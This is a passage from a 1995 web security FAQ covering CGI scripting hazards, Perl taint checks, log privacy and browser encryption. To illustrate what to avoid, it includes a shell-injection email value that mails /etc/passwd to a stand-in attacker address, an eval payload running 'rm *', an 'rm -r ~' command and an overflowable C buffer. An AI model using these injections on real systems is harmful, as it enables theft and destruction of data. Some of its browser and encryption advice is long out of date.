Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.

Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.

A third consideration is that the scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scriptig languages are poor choices for anything more than trivial CGI programs.

All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail shows. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by other people than the author. Furthermore, Perl contains a number of built-in features that were designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make a Perl scripts safer in some respects than the equivalent C program.


Q32: I found a great CGI script on the Web and I want to install it. How can I tell if it's safe?

You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.

Things to think about when you examine a script:

  1. How complex is it? The longer it is, the more likely it is to have problems.
  2. Does it read or write files on the host system? Programs that read files may inadvertently violate access restrictions you've set up, or pass sensitive system information to hackers. Programs that write files have the potential to modify or damage documents, or, in the worst case, introduce trojan horses to your system.
  3. Does it interact with other programs on your system? For example, many CGI scripts send e-mail in response to a form input by opening up a connection with the sendmail program. Is it doing this in a safe way?
  4. Does it run with suid (set-user-id) privileges? In general this is a very dangerous thing and scripts need to have excellent reasons for doing this.
  5. Does the author validate user input from forms? Checking form input is a sign that the author is thinking about security issues.
  6. Does the author use explicit path names when invoking external programs? Relying on the PATH environment variable to resolve partial path names is a dangerous practice.

Q33: What CGI scripts are known to contain security holes?

Quite a number of widely distributed CGI scripts contain known security holes. All the ones that are identified here have since been caught and fixed, but if you are running an older version of the script you may still be vulnerable. Get rid of it and obtain the latest version.
AnyForm
http://www.uky.edu/~johnr/AnyForm2
FormMail
http://alpha.pr1.k12.co.us/~mattw/scripts.html

The holes in these scripts were discovered by Paul Phillips (paulp@cerf.net), who also wrote the CGI security FAQ. Check here for reports of other buggy scripts.

In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.

This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public. Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.


Q34: I'm developing custom CGI scripts. What unsafe practices should I avoid?

  1. Avoid giving out too much information about your site and server host.

    Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.

  2. If you're coding in a compiled language like C, avoid making assumptions about the size of user input.

    A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:

       #include <stdlib.h>
    #include <stdio.h> static char query_string[1024]; char* read_POST() {
    int query_size; query_size=atoi(getenv("CONTENT_LENGTH")); fread(query_string,query_size,1,stdin); return query_string; }
    The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.

    Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:

       char* read_POST() {
    int query_size=atoi(getenv("CONTENT_LENGTH")); char* query_string = (char*) malloc(query_size); if (query_string != NULL) fread(query_string,query_size,1,stdin); return query_string; }
    Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
       #define MAXSTRINGLENGTH 256
       char myString[MAXSTRINGLENGTH];
       char* query = read_POST();
       myString[MAXSTRINGLENGTH-1]='\0';      /* ensure null byte */
       strncpy(myString,query,MAXSTRINGLENGTH-1); /* don't overwrite null byte */
    
    (Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
  3. Never, never, never pass unchecked remote user input to a shell command.

    In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.

    The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

       $mail_to = &get_name_from_input; # read the address from form
       open (MAIL,"| /usr/lib/sendmail $mail_to");
       print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
       close MAIL;
    
    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wiley hacker passes an e-mail address that looks like this?
         nobody@nowhere.com;mail badguys@hell.org</etc/passwd;
    
    Now the open() statement will evaluate the following command:
    /usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwd
    
    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.

Q35: But if I avoid eval(), exec(), popen() and system(), how can I create an interface to my database/search engine/graphics package?

You don't have to avoid these calls completely. You just have to understand what you're doing before you call them. In some cases you can avoid passing user-inputted variables through the shell by calling external programs differently. For example, sendmail supports a -t option, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. The example above can be rewritten in order to take advantage of this feature as shown below (it also uses the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line):
   $mailto = &get_name_from_input; # read the address from form
   open (MAIL,"| /usr/lib/sendmail -t -oi");
   print MAIL <<END;
   To: $mailto
   From: me (me\@nowhere.com)
   Subject: nothing much

   Hi there!
   END
   close MAIL;
C programmers can use the exec family of commands to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.

You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. In fact, it's wise policy to make sure that all user input arguments are what you expect. Even if you don't pass user variables through the shell, you can never be sure that they don't contain constructions that reveal bugs in the programs you're calling.

For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:

  $mail_to = &get_name_from_input; # read the address from form
  unless ($mail_to =~ /^[\w-.]+\@[\w-.]+$/) {
     die 'Address not in form foo@nowhere.com';
  }
(This particular pattern match may be too restrictive for some sites. It doesn't allow UUCP-style addresses or any of the many alternative addressing schemes).

Q36: Is it safe to rely on the PATH environment variable to locate external programs?

Not really. One favorite hacker's trick is to alter the PATH environment variable so that it points to the program he wants your script to execute rather than the program you're expecting. In addition to avoiding passing unchecked user variabes to external programs, you should also invoke the programs using their full absolute pathnames rather than relying on the PATH environment variable. That is, instead of this fragment of C code:
   system("ls -l /local/web/foo");
use this:
   system("/bin/ls -l /local/web/foo");
If you must rely on the PATH, set it yourself at the beginning of your CGI script:
   putenv("PATH=/bin:/usr/bin:/usr/local/bin");

In general it's not a good idea to put the current directory (".") into the path.


Q37: I hear there's a package called cgiwrap that makes CGI scripts safe?

This is not quite true. cgiwrap (by Nathan Neulinger <nneul@umr.edu>, http://www.umr.edu/~cgiwrap) was designed for multi-user sites like university campuses where local users are allowed to create their own scripts. Since CGI scripts run under the server's user ID (e.g. "nobody"), it is difficult under these circumstances for administrators to determine whose script is generating bounced mail, errors in the server log, or annoying messages on other user's screens. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script.

cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. Although this simplifies administration and prevents users from interfering with each other, it does put the individual user at tremendous risk. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command

    rm -r ~

Worse, since the subverted CGI script has write access to the user's home directory, it could place a trojan horse in the user's directory that will subvert the security of the entire system. The "nobody" user, at least, usually doesn't have write permission anywhere.


Q38: People can only use scripts if they're accessed from a form that lives on my local system, right?

Not right. Although you can restrict access to a script to certain IP addresses or to user name/password combinations, you can't control how the script is invoked. A script can be invoked from any form, anywhere in the world. Or its form interface can be bypassed entirely and the script invoked by directly requesting its URL. Don't assume that a script will always be invoked from the form you wrote to go with it. Anticipate that some parameters will be missing or won't have the expected values.

When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.


Q39: Can people see or change the values in "hidden" form variables?

They sure can! The hidden variable is visible in the raw HTML that the server sends to the browser. To see the hidden variables, a user just has to select "view source" from the browser menu. In the same vein, there's nothing preventing a user from setting hidden variables to whatever he likes and sending it back to your script. Don't rely on hidden variables for security.

Q40: Is using the "POST" method for submitting forms more private than "GET"?

If you are concerned about your queries showing up in server logs, or those of Web proxies along the way, this is true. Queries submitted with POST usually don't appear in logs, while GET queries do. In other respects, however, there's no substantial difference in security between the two methods. It is just as easy to intercept unencrypted GET queries as POST queries. Furthermore, unlike some early implementations of HTTP encryption, the current generation of data encrypting server/browser combinations do just as good a job encrypting GET requests as they do for POST requests.

Q41: Where can I learn more about safe CGI scripting?

The CGI security FAQ, maintained by Paul Phillips ( paulp@cerf.net), can be found at:

http://www.primus.com/staff/paulp/cgi-security/

CGI security is also covered by documentation maintained at NCSA:

http://hoohoo.ncsa.uiuc.edu/cgi/security.html

Table of contents


7. Safe Scripting in Perl

Q42: How do I avoid passing user variables through a shell when calling exec() and system()?

In Perl, you can invoke external programs in many different ways. You can capture the output of an external program using backticks:
   $date = `/bin/date`;

You can open up a pipe to a program:

   open (SORT, " | /usr/bin/sort | /usr/bin/uniq");
You can invoke an external program and wait for it to return with system():
   system "/usr/bin/sort < foo.in";
or you can invoke an external program and never return with exec():
   exec "/usr/bin/sort < foo.in";
All of these constructions can be risky if they involve user input that may contain shell metacharacters. For system() and exec(), there's a somewhat obscure syntactical feature that allows you to call external programs directly rather than going through a shell. If you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no unwanted side effects. For example:
   system "/usr/bin/sort","foo.in";
You can take advantage of this feature to open up a pipe without going through a shell. By calling open on the magic character sequence |-, you fork a copy of Perl and open a pipe to the copy. The child copy then immediately exec's another program using the argument list variant of exec().
   open (SORT,"|-") || exec "/usr/bin/sort",$uservariable;
   while $line (@lines) {
     print SORT $line,"\n";
   }
   close SORT;
To read from a pipe without opening up a shell, you can do something similar with the sequence -|:
   open(GREP,"-|") || exec "/usr/bin/grep",$userpattern,$filename;
   while (<GREP>) {
     print "match: $_";
   }
   close GREP;
These are the form of open() you should use whenever you would otherwise perform a piped open to a command.

An even more obscure feature allows you to call an external program and lie to it about its name. This is useful for calling programs that behave differently depending on the name by which they were invoked.

The syntax is

   system $real_name "fake_name","argument1","argument2"
For example:
   $shell = "/bin/sh"
system $shell "-sh","-norc"
This invokes the shell using the name "-sh", forcing it to behave interactively. Note that the real name of the program must be stored in a variable, and that there's no comma between the variable holding the real name and the start of the argument list.

There's also a more compact syntax for this construction:

   system { "/bin/sh" } "-sh","-norc"

Q43: What are Perl taint checks? How do I turn them on?

As we've seen, one of the most frequent security problems in CGI scripts is inadvertently passing unchecked user variables to the shell. Perl provides a "taint" checking mechanism that prevents you from doing this. Any variable that is set using data from outside the program (including data from the environment, from standard input, and from the command line) is considered tainted and cannot be used to affect anything else outside your program. The taint can spread. If you use a tainted variable to set the value of another variable, the second variable also becomes tainted. Tainted variables cannot be used in eval(), system(), exec() or piped open() calls. If you try to do so, Perl exits with a warning message. Perl will also exit if you attempt to call an external program without explicitly setting the PATH environment variable.

You turn on taint checks in version 4 of Perl by using a special version of the interpreter named "taintperl":

   #!/usr/local/bin/taintperl
In version 5 of perl, pass the -T flag to the interpreter:
   #!/usr/local/bin/perl -T
See below for how to "untaint" a variable.

Q44: OK, I turned on taint checks like you said. Now my script dies with the message: "Insecure $ENV{PATH} at line XX" every time I try to run it!

Even if you don't rely on the path when you invoke an external program, there's a chance that the invoked program might. Therefore you need to include the following line towards the top of your script whenever you use taint checks:
   $ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
Adjust this as necessary for the list of directories you want searched. It's not a good idea to include the current directory (".") in the path.

Q45: How do I "untaint" a variable?

Once a variable is tainted, Perl won't allow you to use it in a system(), exec(), piped open, eval(), backtick command, or any function that affects something outside the program (such as unlink). You can't use it even if you scan it for shell metacharacters or use the tr/// or s/// commands to remove metacharacters. The only way to untaint a tainted variable is by performing a pattern matching operation on it and extracting the matched substrings. For example, if you expect a variable to contain an e-mail address, you can extract an untainted copy of the address in this way:
   $mail_address=~/([\w-.]+\@[\w-.]+)/;
   $untainted_address = $1;

Q46: I'm removing shell metacharacters from the variable, but Perl still things it's tainted!

See the answer to the question above. The only way to untaint a variable is to extract substrings using a pattern matching operation.

Q47: Is it true that the pattern matching operation $foo=~/$user_variable/ is unsafe?

A frequent task for Perl CGI scripts is to take a list of keywords provided by the remote user and to use them in a patttern matching operation to fetch a list of matching file names (or something similar). This, in and of itself, isn't dangerous. What is dangerous is an optimization that many Perl programmers use to speed up the pattern matching operation. When you use a variable inside a pattern matching operation, the pattern is recompiled every time the operation is invoked. In order to avoid this expensive recompilation, you can provide the "o" flag to the pattern matching operation to tell Perl to compile the expression once:
    foreach (@files) {
m/$user_pattern/o;
}
Now, however, Perl will ignore any changes you make to the user variable, making this sort of loop fail:
    foreach $user_pattern (@user_patterns) {
       foreach (@files) {
          print if m/$user_pattern/o;
       }
    }
To get around this problem Perl programmers often use this sort of trick:
   foreach $user_pattern (@user_patterns) {
      eval "foreach (\@files) { print if m/$user_pattern/o; }";
   }
The problem here is that the eval() statement involves a user-supplied variable. Unless this variable is checked carefully, the eval() statement can be tricked into executing arbitrary Perl code. (For example of what can happen, consider what the eval statement does if the user passes in this pattern: "/; system 'rm *'; /"

The taint checks described above will catch this potential problem. Your alternatives include using the unoptimized form of the pattern matching operation, or carefully untainting user-supplied patterns. In Perl5, a useful trick is to use the escape sequence \Q \E to quote metacharacters so that they won't be interpreted:

   print if m/\Q$user_pattern\E/o;

Q48: My CGI script needs more privileges than it's getting as user "nobody". How do I run a Perl script as suid?

First of all, do you really need to run your Perl script as suid? This represents a major risk insofar as giving your script more privileges than the "nobody" user has also increases the potential for damage that a subverted script can cause. If you're thinking of giving your script root privileges, think it over extremely carefully.

You can make a script run with the privileges of its owner by setting its "s" bit:

   chmod u+s foo.pl
You can make it run with the privileges of its owner's group by setting the s bit in the group field:
   chmod g+s foo.pl
However, many Unix systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in a nasty error message from Perl itself.

You have two options on such systems:

  1. You can apply a patch to the kernel that disables the suid bits for scripts. Perl will detect these bits nevertheless and do the suid function safely. See the Perl faq for details on obtaining this kernel patch. This faq can be found at:

    ftp://rtfm.mit.edu/pub/usenet-by-group/comp.lang.perl/

  2. You can put a C wrapper around the program. A typical wrapper looks like this:
           #include <unistd.h>
           void main () {
           execl("/usr/local/bin/perl","foo.pl","/local/web/cgi-bin/foo.pl",NULL);
           }
           
    After compiling this program, make it suid. It will run under its owner's permission, launching a Perl interpreter and executing the statements in the file "foo.pl".

Another option is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do. If you're using the CERN server, you can even run as a different user for each script. See the CERN documentation for details.

Table of contents


8. Server Logs and Privacy

(Thanks to Bob Bagwill who contributed many of the Q&A's in this section)

Q49: What information do readers reveal that they might want to keep private?

Most servers log every access. The log usually includes the IP address and/or host name, the time of the download, the user's name (if known by user authentication or obtained by the identd protocol), the URL requested (including the values of any variables from a form submitted using the GET method), the status of the request, and the size of the data transmitted. Some browsers also provide the client the reader is using, the URL that the client came from, and the user's e-mail address. Servers can log this information as well, or make it available to CGI scripts. Most WWW clients are probably run from single-user machines, thus a download can be attributed to an individual. Revealing any of those datums could be potentially damaging to a reader.

For example, XYZ.com downloading financial reports on ABC.com could signal a corporate takeover. The accesses to a internal job posting reveals who might be interested in changing jobs. The time a cartoon was downloaded reveals that the reader is misusing company resources. A referral log entry might contain something like:

 file://prez.xyz.com/hotlists/stocks2sellshort.html -> http://www.xyz.com/

The pattern of accesses made by an individual can reveal how they intend to use the information. And the input to searches can be particularly revealing.

Another way Web usage can be revealed locally is via browser history, hotlists, and cache. If someone has access to the reader's machine, they can check the contents of those databases. An obvious example is shared machines in an open lab or public library.

Proxy servers used for access to Web services outside an organization's firewall are in a particularly sensitive position. A proxy server will log every access to the outside Web made by every member of the organization and track both the IP number of the host making the request and the requested URL. A carelessly managed proxy server can therefore represent a significant invasion of privacy.


Q50: Do I need to respect my readers' privacy?

Yes. One of the requirements of responsible net citizenship is respecting the privacy of others. Just as you don't forward or post private email without the author's consent, in general you shouldn't use or post Web usage statistics that be attributed to an individual.

If you are a government site, you may be required by law to protect the privacy of your readers. For example, U.S. Federal agencies are not allowed to collect or publish many types of data about their clients.

In most U.S. states, it is illegal for libraries and video stores to sell or otherwise distribute records of the materials that patrons have checked out. While the courts have yet to apply the same legal standard to be applied to electronic information services, it is not unreasonable for users to have the same expectation of privacy on the Web. In other countries, for example Germany, the law explicitly forbids the disclosure of online access lists. If your site chooses to use the Web logs to populate your mailing lists or to resell to other businesses, make sure you clearly advertise that fact.


Q51: How do I avoid collecting too much information?

One of the requirements of your Web site may be to collect statistics on usage to provide data to the organization and to justify Web site resources. In general, collecting information about accesses by individuals is probably not warranted or even useful.

The easiest way to avoid collecting too much information is to use a server that allows you to tailor the output logs, so that you can throw away everything but the essentials. Another way is to regularly summarize and discard the raw logs. Since the logs of popular sites tend to grow quickly, you probably will need to do that anyway.


Q52: How do I protect my readers' privacy?

There are two classes of readers: outsiders reading your documents, and insiders reading your documents and outside documents.

You can protect outsiders by summarizing your logs. You can help protect insiders by:

  1. having a clear site policy on Web usage.
  2. educating them about the site policy and risks of Web usage.
  3. using a site-wide proxy cache to hide the identity of individual hosts from outside servers.

If your site does not want to reveal certain Web accesses from your site's domain, you may need to get Web client accounts from another Internet provider that can provide anonymous access. Table of contents


9. Client Side Security

(Thanks to Laura Pearlman, who contributed many of the Q&A's in this section).

Q53: Someone suggested I configure /bin/csh as a viewer for documents of type application/x-csh. Is this a good idea?

This is not a good idea. Configuring any command-line shell, interpreter, macro processor, of scripting language processor as the "viewer" for a document type leaves you vulnerable to attack over the Web. You should never blindly execute any program you download from the Internet (including programs obtained by FTP). It is safer to download a script as text, look it over to make sure it isn't doing anything malicious, and then run it by hand.

These words of warning apply also to the macro worksheets generated by popular PC spreadsheet programs. Although it seems natural to declare a type "application/x-msexcel-macro" in order to receive spreadsheets that automatically recalculate themselves, some of the functions in the Excel macro language have the potential to inflict damage on other worksheets and files. These warnings even apply to such seemingly innocuous things as word processor style sheets and template files! Many high end word processors have a built-in macro processing ability. An example of the way in which word processing macros can be misused is the Microsoft Word "prank macro", which has the ability to spread, virus-like, from document to document.

I have heard of at least one individual who decided he'd only be using the C-shell to download scripts written by himself and other trusted parties. He screened all URLs by hand to make sure they didn't end with a .csh extension before downloading them. Unfortunately the file extension is not a reliable way to determine what a URL contains. The type of a document is determined by the Web (HTTP) server, not the browser, and a document of type application/x-csh can just as easily have an extension of .txt or no extension at all.

In short, beware of declaring an external viewer for any file that contains executable statements.

This security problem is addressed by scripting languages as Java and Safe Tcl in which dangerous functions can be disabled. There's even a prototype "Safe Perl" that can be used as a safer external viewer for perl programs.


Q54: Is there anything else I should keep in mind regarding external viewers?

Yes. Whenever you upgrade a program that you've configured as an external viewer you should think about the issues related in Q53 in light of the program's new features. For example, if the viewer is a word processor, and the new version has just added scripting/macro features, is there any chance that loading and displaying the document could automatically launch a script?

Q55: How do I turn off the "You are submitting the contents of a form insecurely" message in Netscape? Should I worry about it?

This message indicates that the contents of a form that you're submitting to a CGI script is not encrypted and could be intercepted. Right now you'll get this message whenever you submit a form to any non-Netscape server, since only the Netsite Commerce Server can handle encrypted forms. You probably shouldn't send sensitive information such as credit card numbers via unencrypted forms (however if you're the type who reads his credit card number over cellular phones, an even more insecure means of communication, go right ahead!).

To turn this warning off, select Preferences from Netscape's Options menu, choose "Images and Security", and uncheck the checkbox labeled "Warn before submitting forms insecurely."


Q56 How secure is the encryption used by SSL?

SSL uses public-key encryption to exchange a session key between the client and server; this session key is used to encrypt the http transaction (both request and response). Each transaction uses a different session key so that if someone manages to decrypt a transaction, that does not mean that they've found the server's secret key; if they want to decrypt another transaction, they'll need to spend as much time and effort on the second transaction as they did on the first.

Netscape servers and browsers do encryption using either a 40-bit secret key or a 128-bit secret key. Many people feel that using a 40-bit key is insecure because it's vulnerable to a "brute force" attack (trying each of the 2^40 possible keys until you find the one that decrypts the message). Using a 128-bit key eleiminates this problem because there are 2^128 instead of 2^40 possible keys. Unfortunately, most Netscape users have browsers that support only 40-bit secret keys. This is because of legal restrictions on the encryption software that can be exported from the United States (The Federal Government has recently modified this policy on following the well-publicized cracking of a Netscape message encrypted using a 40-bit key. Expect this situation to change).

In Netscape you can tell what kind of encryption is in use for a particular document by looking at the "document" information" screen accessible from the file menu. The little key in the lower left-hand corner of the Netscape window also indicates this information. A solid key with two teeth means 128-bit encryption, a solid key with one tooth means 40-bit encryption, and a broken key means no encryption. Even if your browser supports 128-bit encryption, it mayse use 40-bit encryption when talking to older Netscape servers or Netscape servers outside the U.S. and Canada.


Q57 My Netscape browser is displaying a form for ordering merchandise from a department store that I trust. The little key at the lower left-hand corner of the Netscape window is solid and has two teeth. This means I can safely submit my credit card number, right?

Not quite. A solid key with two teeth appears indicates that SSL is being used with a 128-bit secret key and that the remote host owns a valid server certificate that was certified by some authority that Netscape recognizes. At this point, however, you don't know who that certificate belongs to. It's possible that someone has bought or stolen a server certificate and then diverted network traffic destined for the department store by subverting a router somewhere between you and the store. The only way to make sure that you're talking to the company you think you're talking to is to open up the "Document Information" window (from the File menu) and examine the server certificate. If the host and organization names that appear there match the company you expect, then you're probably safe to submit the form. If something unexpected appears there (like "Embezzlers R Us") you might want to call the department store's 800 number.

Q58: How private are my requests for Web documents?

Read section (7) above. All requests for documents are logged by the Web server. Although your name is not usually logged, your IP address and computer's host name usually is. In addition, some servers also log the URL you were viewing (such as your home page) at the time you requested the new URL. If the site is well administered, the record of your accesses will be used for statistics generation and debugging only. However, some sites may leave the logs open for casual viewing by local users at the site or even use them to create mailing lists.

The contents of queries in forms submitted using the GET request appear in the server log files because the query is submitted as part of the URL. However, when a query is submitted as a POST request (which is often the case when submitting a fill-out form), the data you submit doesn't get logged. If you are concerned about the contents of a keyword search appearing in a public log somewhere, check whether the search script uses the GET or POST method. The easiest technique is to try an innocuous query first. If the contents of the query appear in the URL of the retrieved document, then they probably appear in the remote server's logs too.

Server/browser combinations that use data encryption, such as Netsite/Netscape, encrypt the URL request. Furthermore the encrypted request, because it is submitted as a POST request, does not appear in the server logs.

Table of contents


10. Bibliography

General Security for Web Servers

  1. How to Set Up and Maintain a World Wide Web Site: The Guide for Information Providers, by Lincoln D. Stein (Addison-Wesley), 496 pages, list price $29.95, ISBN 0-201-63389-2 (information available at http://www-genome.wi.mit.edu/WWW/).
  2. Managing Internet Information Systems, by Cricket Liu, Jerry Peek, Russ Jones, Bryan Buus, and Adrian Nye ( O'Reilly & Associates, Inc.), ISBN 1-56592-051-1

Firewalls

  1. Firewalls and Internet Security: Repelling the Wily Hacker, by William R. Cheswick and Steven M. Bellovin ( Addison-Wesley), ISBN 0-201-63357-4
  2. Building Internet Firewalls by D. Brent Chapman and Elizabeth D. Zwicky published by O'Reilly & Associates, 1st Edition September 1995 517 pages, list price $29.95, ISBN 1-56592-124-0 (information also available at http://www.greatcircle.com/firewalls-book/).

Unix System Security

  1. Unix System Security: A Guide for Users and System Administrators, by David Curry (O'Reilly & Associates).
  2. Practical Unix Security, by Simson Garfinkel and Gene Spafford (O'Reilly & Associates,Inc.) ISBN 0-937175-72-2

Cryptography

  1. Applied Cryptography, by Bruce Schneier (Wiley), 618 pages, $44.95, ISBN 0-471-59756-2.

Perl

  1. Programming Perl, by Larry Wall and Randal L. Schwartz (O'Reilly & Associates, Inc.), ISBN 0-937175-64-1
Table of contents
Lincoln D. Stein
Whitehead Institute for Biomedical Research

Last Modified September 9, 1995